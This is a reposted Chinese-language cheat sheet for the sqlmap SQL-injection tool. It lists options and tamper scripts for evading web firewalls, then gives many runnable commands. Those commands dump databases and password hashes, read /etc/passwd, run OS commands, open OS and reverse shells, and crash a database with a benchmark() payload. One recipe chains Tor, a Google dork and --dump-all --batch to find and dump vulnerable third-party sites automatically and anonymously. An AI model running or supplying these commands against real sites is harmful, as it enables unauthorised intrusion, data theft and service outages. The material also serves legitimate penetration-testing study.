转自:http://www.zerokeeper.com/web-security/sqlmap-usage-summary.html

0x01 需要了解

当给 sqlmap 这么一个 url 的时候,它会:
1、判断可注入的参数

2、判断可以用那种 SQL 注入技术来注入

3、识别出哪种数据库

4、根据用户选择,读取哪些数据

sqlmap 支持五种不同的注入模式:
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。

2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。

3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。

4、联合查询注入,可以使用 union 的情况下的注入。

5、堆查询注入,可以同时执行多条语句的执行时的注入。


sqlmap 支持的数据库有:

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase 和 SAP MaxDB

0x02 安装

  1. git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

0x03 Options(选项):

–version 显示程序的版本号并退出
-h, –help 显示此帮助消息并退出
-v VERBOSE 详细级别:0-6(默认为 1)

Target(目标):
以下至少需要设置其中一个选项,设置目标 URL。
-d DIRECT 直接连接到数据库。
-u URL, –url=URL 目标 URL。
-l LIST 从 Burp 或 WebScarab 代理的日志中解析目标。
-r REQUESTFILE 从一个文件中载入 HTTP 请求。
-g GOOGLEDORK 处理 Google dork 的结果作为目标 URL。
-c CONFIGFILE 从 INI 配置文件中加载选项。

Request(请求)::
这些选项可以用来指定如何连接到目标 URL。
–data=DATA 通过 POST 发送的数据字符串
–cookie=COOKIE HTTP Cookie 头
–cookie-urlencode URL 编码生成的 cookie 注入
–drop-set-cookie 忽略响应的 Set –Cookie 头信息
–user-agent=AGENT 指定 HTTP User –Agent 头
–random-agent 使用随机选定的 HTTP User-Agent 头
–referer=REFERER 指定 HTTP Referer 头
–headers=HEADERS 换行分开,加入其他的 HTTP 头
–auth-type=ATYPE HTTP 身份验证类型(基本,摘要或 NTLM)(Basic, Digest or NTLM)
–auth-cred=ACRED HTTP 身份验证凭据(用户名: 密码)
–auth-cert=ACERT HTTP 认证证书(key_file,cert_file)
–proxy=PROXY 使用 HTTP 代理连接到目标 URL
–proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码)
–ignore-proxy 忽略系统默认的 HTTP 代理
–delay=DELAY 在每个 HTTP 请求之间的延迟时间,单位为秒
–timeout=TIMEOUT 等待连接超时的时间(默认为 30 秒)
–retries=RETRIES 连接超时后重新连接的时间(默认 3)
–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
–safe-url=SAFURL 在测试过程中经常访问的 url 地址
–safe-freq=SAFREQ 两次访问之间测试请求,给出安全的 URL

Optimization(优化):
这些选项可用于优化 sqlmap.py 的性能。
-o 开启所有优化开关
–predict-output 预测常见的查询输出
–keep-alive 使用持久的 HTTP(S) 连接
–null-connection 从没有实际的 HTTP 响应体中检索页面长度
–threads=THREADS 最大的 HTTP(S) 请求并发量(默认为 1)

Injection(注入):
这些选项可以用来指定测试哪些参数,提供自定义的注入 payloads 和可选篡改脚本。
-p TESTPARAMETER 可测试的参数
–dbms=DBMS 强制后端的 DBMS 为此值
–os=OS 强制后端的 DBMS 操作系统为这个值
–prefix=PREFIX 注入 payload 字符串前缀
–suffix=SUFFIX 注入 payload 字符串后缀
–tamper=TAMPER 使用给定的脚本篡改注入数据
–tamper 通过编码绕过 WEB 防火墙(WAF)sqlmap.py 默认用 char()
–tamper 插件所在目录 \ sqlmap-dev\tamper

  1. apostrophemask.py 用 UTF-8 全角字符替换单引号字符
  2. apostrophenullencode.py 用非法双字节 unicode 字符替换单引号字符
  3. appendnullbyte.py 在 payload 末尾添加空字符编码
  4. base64encode.py 对给定的 payload 全部字符使用 Base64 编码
  5. between.py 分别用 “NOT BETWEEN 0 AND #” 替换大于号 “>”,“BETWEEN # AND #” 替换等于号“=”
  6. bluecoat.py 在 SQL 语句之后用有效的随机空白符替换空格符,随后用 “LIKE” 替换等于号“=”
  7. chardoubleencode.py 对给定的 payload 全部字符使用双重 URL 编码(不处理已经编码的字符)
  8. charencode.py 对给定的 payload 全部字符使用 URL 编码(不处理已经编码的字符)
  9. charunicodeencode.py 对给定的 payload 的非编码字符使用 Unicode URL 编码(不处理已经编码的字符)
  10. concat2concatws.py 用 “CONCAT_WS(MID(CHAR(0), 0, 0), A, B)” 替换像 “CONCAT(A, B)” 的实例
  11. equaltolike.py 用 “LIKE” 运算符替换全部等于号“=”
  12. greatest.py 用 “GREATEST” 函数替换大于号“>”
  13. halfversionedmorekeywords.py 在每个关键字之前添加 MySQL 注释
  14. ifnull2ifisnull.py 用 “IF(ISNULL(A), B, A)” 替换像 “IFNULL(A, B)” 的实例
  15. lowercase.py 用小写值替换每个关键字字符
  16. modsecurityversioned.py 用注释包围完整的查询
  17. modsecurityzeroversioned.py 用当中带有数字零的注释包围完整的查询
  18. multiplespaces.py 在 SQL 关键字周围添加多个空格
  19. nonrecursivereplacement.py 用 representations 替换预定义 SQL 关键字,适用于过滤器
  20. overlongutf8.py 转换给定的 payload 当中的所有字符
  21. percentage.py 在每个字符之前添加一个百分号
  22. randomcase.py 随机转换每个关键字字符的大小写
  23. randomcomments.py 向 SQL 关键字中插入随机注释
  24. securesphere.py 添加经过特殊构造的字符串
  25. sp_password.py 向 payload 末尾添加 “sp_password” for automatic obfuscation from DBMS logs
  26. space2comment.py 用 “/**/” 替换空格符
  27. space2dash.py 用破折号注释符 “--” 其次是一个随机字符串和一个换行符替换空格符
  28. space2hash.py 用磅注释符 “#” 其次是一个随机字符串和一个换行符替换空格符
  29. space2morehash.py 用磅注释符 “#” 其次是一个随机字符串和一个换行符替换空格符
  30. space2mssqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
  31. space2mssqlhash.py 用磅注释符 “#” 其次是一个换行符替换空格符
  32. space2mysqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
  33. space2mysqldash.py 用破折号注释符 “--” 其次是一个换行符替换空格符
  34. space2plus.py 用加号 “+” 替换空格符
  35. space2randomblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
  36. unionalltounion.py 用 “UNION SELECT” 替换“UNION ALL SELECT”
  37. unmagicquotes.py 用一个多字节组合 %bf%27 和末尾通用注释一起替换空格符
  38. varnish.py 添加一个 HTTP 头 “X-originating-IP” 来绕过 WAF
  39. versionedkeywords.py 用 MySQL 注释包围每个非函数关键字
  40. versionedmorekeywords.py 用 MySQL 注释包围每个关键字
  41. xforwardedfor.py 添加一个伪造的 HTTP 头 “X-Forwarded-For” 来绕过 WAF

Detection(检测):
这些选项可以用来指定在 SQL 盲注时如何解析和比较 HTTP 响应页面的内容。
–level=LEVEL 执行测试的等级(1-5,默认为 1)
–risk=RISK 执行测试的风险(0-3,默认为 1)
–string=STRING 查询有效时在页面匹配字符串
–regexp=REGEXP 查询有效时在页面匹配正则表达式
–text-only 仅基于文本内容比较网页

这些选项可用于调整具体的 SQL 注入测试。
–technique=TECH SQL 注入技术测试(默认 BEUST)
Techniques(技巧):
–technique /* 测试指定注入类型 \ 使用的技术
不加参数默认测试所有注入技术:
B: 基于布尔的 SQL 盲注
E: 基于显错 sql 注入
U: 基于 UNION 注入
S: 叠层 sql 注入
T: 基于时间盲注

–time-sec=TIMESEC DBMS 响应的延迟时间(默认为 5 秒)
–union-cols=UCOLS 定列范围用于测试 UNION 查询注入
–union-char=UCHAR 用于暴力猜解列数的字符

Fingerprint(指纹):
-f, –fingerprint 执行检查广泛的 DBMS 版本指纹

Enumeration(枚举):
这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己的 SQL 语句。
-b, –banner 检索数据库管理系统的标识
–current-user 检索数据库管理系统当前用户
–current-db 检索数据库管理系统当前数据库
–is-dba 检测 DBMS 当前用户是否 DBA
–users 枚举数据库管理系统用户
–passwords 枚举数据库管理系统用户密码哈希
–privileges 枚举数据库管理系统用户的权限
–roles 枚举数据库管理系统用户的角色
–dbs 枚举数据库管理系统数据库
–tables 枚举 DBMS 数据库中的表
–columns 枚举 DBMS 数据库表列
–dump 转储数据库管理系统的数据库中的表项
–dump-all 转储所有的 DBMS 数据库表中的条目
–search 搜索列,表和 / 或数据库名称
-D DB 要进行枚举的数据库名
-T TBL 要进行枚举的数据库表
-C COL 要进行枚举的数据库列
-U USER 用来进行枚举的数据库用户
–exclude-sysdbs 枚举表时排除系统数据库
–start=LIMITSTART 第一个查询输出进入检索
–stop=LIMITSTOP 最后查询的输出进入检索
–first=FIRSTCHAR 第一个查询输出字的字符检索
–last=LASTCHAR 最后查询的输出字字符检索
–sql-query=QUERY 要执行的 SQL 语句
–sql-shell 提示交互式 SQL 的 shell

Brute force(蛮力):
这些选项可以被用来运行蛮力检查。
–common-tables 检查存在共同表
–common-columns 检查存在共同列

User-defined function injection(用户自定义函数注入):
这些选项可以用来创建用户自定义函数。
–udf-inject 注入用户自定义函数
–shared-lib=SHLIB 共享库的本地路径

File system access(访问文件系统):
这些选项可以被用来访问后端数据库管理系统的底层文件系统。
–file-read=RFILE 从后端的数据库管理系统文件系统读取文件
–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

Operating system access(操作系统访问):
这些选项可以用于访问后端数据库管理系统的底层操作系统。
–os-cmd=OSCMD 执行操作系统命令
–os-shell 交互式的操作系统的 shell
–os-pwn 获取一个 OOB shell,meterpreter 或 VNC
–os-smbrelay 一键获取一个 OOB shell,meterpreter 或 VNC
–os-bof 存储过程缓冲区溢出利用
–priv-esc 数据库进程用户权限提升
–msf-path=MSFPATH Metasploit Framework 本地的安装路径
–tmp-path=TMPPATH 远程临时文件目录的绝对路径

Windows 注册表访问:
这些选项可以被用来访问后端数据库管理系统 Windows 注册表。
–reg-read 读一个 Windows 注册表项值
–reg-add 写一个 Windows 注册表项值数据
–reg-del 删除 Windows 注册表键值
–reg-key=REGKEY Windows 注册表键
–reg-value=REGVAL Windows 注册表项值
–reg-data=REGDATA Windows 注册表键值数据
–reg-type=REGTYPE Windows 注册表项值类型

General(一般):
这些选项可以用来设置一些一般的工作参数。
-t TRAFFICFILE 记录所有 HTTP 流量到一个文本文件中
-s SESSIONFILE 保存和恢复检索会话文件的所有数据
–flush-session 刷新当前目标的会话文件
–fresh-queries 忽略在会话文件中存储的查询结果
–eta 显示每个输出的预计到达时间
–update 更新 SqlMap
–save file 保存选项到 INI 配置文件
–batch 从不询问用户输入,使用所有默认配置。

Miscellaneous(杂项):
–beep 发现 SQL 注入时提醒
–check-payload IDS 对注入 payloads 的检测测试
–cleanup sqlmap.py 具体的 UDF 和表清理 DBMS
–forms 对目标 URL 的解析和测试形式
–gpage=GOOGLEPAGE 从指定的页码使用谷歌 dork 结果
–page-rank Google dork 结果显示网页排名(PR)
–parse-errors 从响应页面解析数据库管理系统的错误消息
–replicate 复制转储的数据到一个 sqlite3 数据库
–tor 使用默认的 Tor(Vidalia/ Privoxy/ Polipo)代理地址
–wizard 给初级用户的简单向导界面

0x04 基本用法

./sqlmap.py sqlmap -u "http://www.xxx.com" // 查是否有注入,一些基本信息

./sqlmap.py -u "http://www.xxx.com" --dbs // 枚举数据库

./sqlmap.py sqlmap -u "http://www.xxx.com" --tables // 表名枚举

./sqlmap.py sqlmap -u "http://www.xxx.com" --columns -T 数据库表名 // 字段枚举

./sqlmap.py sqlmap -u "http://www.xxx.com" --dump -T 数据库表名 -C "字段 1,字段 2,字段 3" //dump

./sqlmap.py -u "http://www.xxx.com" --dump -D 数据库名 -T 表名 -C "字段名 1,字段名 2,字段名 3" //dump

读取数据库—> 读取表—-> 读取表的列—-> 获取内容

0x05 一、初级用法

sqlmap.py -u “http://url/news?id=1” –dbs / 查询是什么数据库
sqlmap.py -u “http://url/news?id=1” –current-db /
获取当前数据库名称
sqlmap.py -u “http://url/news?id=1” –current-user / 获取当前用户名称
sqlmap.py -u “http://url/news?id=1” -D DataName –tables /
获取 DataName 数据库的表
sqlmap.py -u “http://url/news?id=1” –columns -T “tablename” users-D “db_name” -v 0 /* 列字段

sqlmap.py -u “http://url/news?id=1” -D DataName –T TableNamen –C “admin,password” –dump -v 0 / 获取字段数据
sqlmap.py -u “http://url/news?id=1” –dbms “Mysql” /
指定数据库类型
sqlmap.py -u “http://url/news?id=1” –users / 列数据库用户
sqlmap.py -u “http://url/news?id=1” –passwords /
获取数据库用户密码
sqlmap.py -u “http://url/news?id=1” –passwords -U root -v 0 / 列出指定用户数据库密码
sqlmap.py -u “http://url/news?id=1” –dump -C “password,user,id” -T “tablename” -D “db_name” –start 1 –stop 20 /
列出指定字段,列出 20 条
sqlmap.py -u “http://url/news?id=1” –dump-all -v 0 / 列出所有数据库所有表
sqlmap.py -u “http://url/news?id=1” –privileges /
查看权限
sqlmap.py -u “http://url/news?id=1” –privileges -U root / 查看指定用户权限
sqlmap.py -u “http://url/news?id=1” –is-dba -v 1 /
是否是数据库管理员
sqlmap.py -u “http://url/news?id=1” –roles / 枚举数据库用户角色
sqlmap.py -u “http://url/news?id=1” –udf-inject /
导入用户自定义函数(获取 系统权限!)
sqlmap.py -u “http://url/news?id=1” –dump-all –exclude-sysdbs -v 0 / 列出当前库所有表
sqlmap.py -u “http://url/news?id=1” –union-cols /
union 查询表记录
sqlmap.py -u “http://url/news?id=1” –cookie “COOKIE_VALUE” /cookie 注入
sqlmap.py -u “http://url/news?id=1” -b(–banner) /
获取 banner 信息
sqlmap.py -u “http://url/news?id=1” –data “id=3” /post 注入
sqlmap.py -u “http://url/news?id=1” -v 1 -f /
指纹判别数据库类型
sqlmap.py -u “http://url/news?id=1” –proxy “http://127.0.0.1:8118” / 代理注入
sqlmap.py -u “http://url/news?id=1” –string “STRING_ON_TRUE_PAGE” /
指定关键词
sqlmap.py -u “http://url/news?id=1” –sql-shell / 执行指定 sql 命令
sqlmap.py -u “http://url/news?id=1” –file /etc/passwd
sqlmap.py -u “http://url/news?id=1” –os-cmd=whoami /
执行系统命令
sqlmap.py -u “http://url/news?id=1” –os-shell / 系统交互 shell
sqlmap.py -u “http://url/news?id=1” –os-pwn /
反弹 shell
sqlmap.py -u “http://url/news?id=1” –reg-read / 读取 win 系统注册表
sqlmap.py -u “http://url/news?id=1” –dbs-o “sqlmap.log”/
保存进度
sqlmap.py -u “http://url/news?id=1” –dbs -o “sqlmap.log” –resume /* 恢复 已保存进度

0x06 二、高级用法

利用 cookies

1--level 2 枚举强度
2--cookie "id=9"
在 ASP 中, request 对象获取客户端提交数据常用的是 get 和 post 两种方式, 同时 request 对象可以不通过集合来获得数据, 即直接使用”request(“name”)”. 但它效率低下, 容易出错, 当我们省略具体的集合名称时, asp 是按 QueryString(get),Form(post),Cookie,Severvariable, 集合的顺序来搜索的. cookie 是保存在客户端的一个文本文件, 可以进行修改, 这样一来, 就可以利用 Request.cookie 方式来提交变量的值, 从而利用系统的漏洞进行注入攻击

表单

表单枚举
./sqlmap.py -u "http://www.xxx.com" --forms

指定表单数据
./sqlmap.py -u "http://www.xxx.com" --data "tfUName=1&UPass=1"

burpsuite 抓包与构造 request 请求

./sqlmap.py -r search_test.py -p tfUPass

交互式 shell

  1. ./sqlmap.py -u "http://www.xxx.com" --os-cmd "ipconfig"
  2. ./sqlmap.py -u "http://www.xxx.com" --os-shell
  3. ./sqlmap.py -u "http://www.xxx.com"--os-pwn
  4. ./sqlmap.py -u "http://www.xxx.com"--sql-shell

php 提供上传页面, 使用 shell 可提权。

伪静态注入

"http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html"

./sqlmap.py -u "http://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html"

google hacking

-p name / 多个参数如 index.php?n_id=1&name=2&data=2020 我们想指定 name 参数进行注入
sqlmap.py -g “site:xxxxx.com inurl:php?id=” –dump-all –batch /
google 搜索注入点自动跑出所有字段,需保证 google.com 能正常访问

DoS Attack

在 sql shell 中执行

使用特定 sql 导致数据库报错停止运行

select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

WAF bypass

--batch Never ask for user input, use the default behaviour
--tamper=TAMPER Use given script(s) for tampering injection data
常见 encoder: space2hash.py, space2morehash.py, base64encode.py, charencode.py

示例

./sqlmap.py -u "http://www.xxx.com" -v 3 --dbs --batch --tamper "space2hash.py"

权限查看

--privileges Enumerate DBMS users privileges
示例

./sqlmap.py -u "http://www.xxx.com" --privileges

Tor 与跳板

Tor
安装 Tor 服务

sudo apt-get install -y tor

启动 Tor 服务

sudo service tor start
下面的命令将运行 SQLMap 用一些基本的设置使用 Tor 继续攻击者匿名, 也完全自动化的选择可能脆弱的网站, 使其在谷歌上搜索他们。

从一个终端攻击者将执行下列 (记住, 这只是向您显示攻击者是多么容易, 您可能不希望运行此):

./sqlmap.py --tor --tor-type=SOCKS5 -g "inurl:.php?id=1" --random-agent --dump-all --batch
--time-sec=15
Script Breakdown
--tor
使用 Tor 网络当连接到目标网站攻击

--tor-type=SOCKS5
在 SOCKS5 协议使用 Tor,比默认 Tor 匿名类型 HTTP 代理更好用。

智能 level 执行测试等级

sqlmap.py -u “http://www.2cto.com /news?id=1” –smart –level 3 –users /*smart 智能 level 执行测试等级

攻击实例:

  1. sqlmap.py -u “http://url/news?id=1&Submit=Submit” –cookie=”PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user –password

0x07 参考资料

  1. sqlmap 笔记
  2. SQLmap 用户手册
  3. 神器 SQLMAP 命令炸翻太平洋
  4. http://www.moonsec.com/post-638.html

sqlmap总结的更多相关文章

  1. 关于sqlmap的使用

    好记性不如烂笔头,记录一下. 带cookie的注入 python sqlmap.py -u "http://www.xxx.com?id=1" --cookie="coo ...

  2. SQLMap Tamper Scripts Update 04/July/2016

    SQLMap Tamper Scripts Update apostrophemask.py Replaces apostrophe character with its UTF-8 full wid ...

  3. 定制sqlmap tamper脚本

    前言 渗透测试过程中遇到注入点常常丢到sqlmap中进行测试,假如网站有waf,sqlmap便无法直接注入了. 测试 在测试某个项目的过程中,一个页面的aid参数,习惯性的提交 and 1=1发现直接 ...

  4. sqlmap --dns-domain模拟实践

    因为看到乌云的这一篇文章 http://drop.xbclub.org/static/drops/tips-5283.html 里面的提到的用sqlmap 的--dns-domain 进行dns 注入 ...

  5. 防止sql注入和sqlmap介绍

    sql注入问题从WEB诞生到现在也一直没停过,各种大小公司都出现过sql注入问题,导致被拖库,然后存在社工库撞库等一系列影响. 防止sql注入个人理解最主要的就一点,那就是变量全部参数化,能根本的解决 ...

  6. sqlmap 帮助信息

    Usage: sqlmap.py [options] 选项: -h, --help 显示基本的帮助信息并退出 -hh 显示高级的帮助信息并退出 --version 显示程序版本号并退出 -v VERB ...

  7. sqlmap用户手册 | WooYun知识库

    sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息. 原文:http://drops.wooyun.org/tips/143  ============ ...

  8. sqlmap http头注入的一个技巧

    sqlmap.py -u "url" --host * --thread=1 --batch -v 1 --delay=0.7 --dbms mysql   --current-d ...

  9. 利用sqlmap进行mysql提权的小方法(win与liunx通用)

    文章作者:pt007@vip.sina.com文章来源:https://www.t00ls.net/thread-36196-1-1.html1.连接mysql数据打开一个交互shell:sqlmap ...

  10. 4.羽翼sqlmap学习笔记之Post登录框注入

    4.Sqlmap系列教程——post登录框注入注入点: http://xxx.xxx.com/Login.asp 注入方式一: 1.对着注入点使用burp抓包,保存txt格式文件. 2.输入命令: . ...

随机推荐

  1. DDD 实战记录——实现「借鉴学习计划」

    「借鉴学习计划」的核心是:复制一份别人的学习计划到自己的计划中,并同步推送学习任务给自己,并且每个操作都要发送通知给对方. 它们的类图如下: 它们的关系是一对多: // Schedule entity ...

  2. render加载vue文件 vue-loader配置

    默认webpack无法打包.vue文件,需要安装相关Loader安装 npm install vue-loader vue-template-compiler -D webpack.config.js ...

  3. 静态方法staticmethod和类方法classmethod

    静态方法staticmethod和类方法classmethod 一.类方法classmethod 把一个方法变成一个类中的方法,这个方法可以直接利用类来调用,不需要依托任何的对象,即不需要实例化也可以 ...

  4. 【5000 Stars 福利】微信接口动态 WebApi 使用说明

    前言 作为中国 C# 开源项目中 Watch/Star/Fork 最高的项目之一,Senparc.Weixin SDK  凝聚了盛派微信团队持续7年的付出,和大量开发者的无私贡献,以及数万开发者的使用 ...

  5. django-channels的部署(supervisor+daphne+nginx)

    项目中需要一个聊天室的功能,所以需要websocket通信,选择了使用channels模块,主要记录下channels部署的配置和一些坑. 原项目是通过nginx+uwsgi部署的,这里我没做任何改动 ...

  6. MySql报错(持续更新)

    目录 MySql报错 1. 重复键报错1062- duplicate entry '0' for key 'xxx' 1.1 报错场景 1.2 报错原因 1.3 解决方法 1.4 具体举例 2. VS ...

  7. Geoserver发布服务

    Geoserver发布服务的数据源很多样化 在数据存储中选择要发布的数据来源,这里以POSTGIS为例 1. 2.如果成功,就会读取出库里面的表,你可以在这里添加图层,发布服务 3.点击发布,进行服务 ...

  8. cesium 雷达扫描(附源码下载)

    前言 cesium 官网的api文档介绍地址cesium官网api,里面详细的介绍 cesium 各个类的介绍,还有就是在线例子:cesium 官网在线例子,这个也是学习 cesium 的好素材. 内 ...

  9. TSC打印机防重码在线检测系统

    条码标签作为产品的一个身份标识,被应用得越来越普及,但随着使用量的增大,在打印条码流水号的过程中,偶尔会出现打印重复号码的标签出现,这样对产品生产及管理过程中会产生极大的混乱,会收到严重的客诉及返工, ...

  10. 「漏洞预警」Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现

    漏洞描述 Apache Flink是一个用于分布式流和批处理数据的开放源码平台.Flink的核心是一个流数据流引擎,它为数据流上的分布式计算提供数据分发.通信和容错功能.Flink在流引擎之上构建批处 ...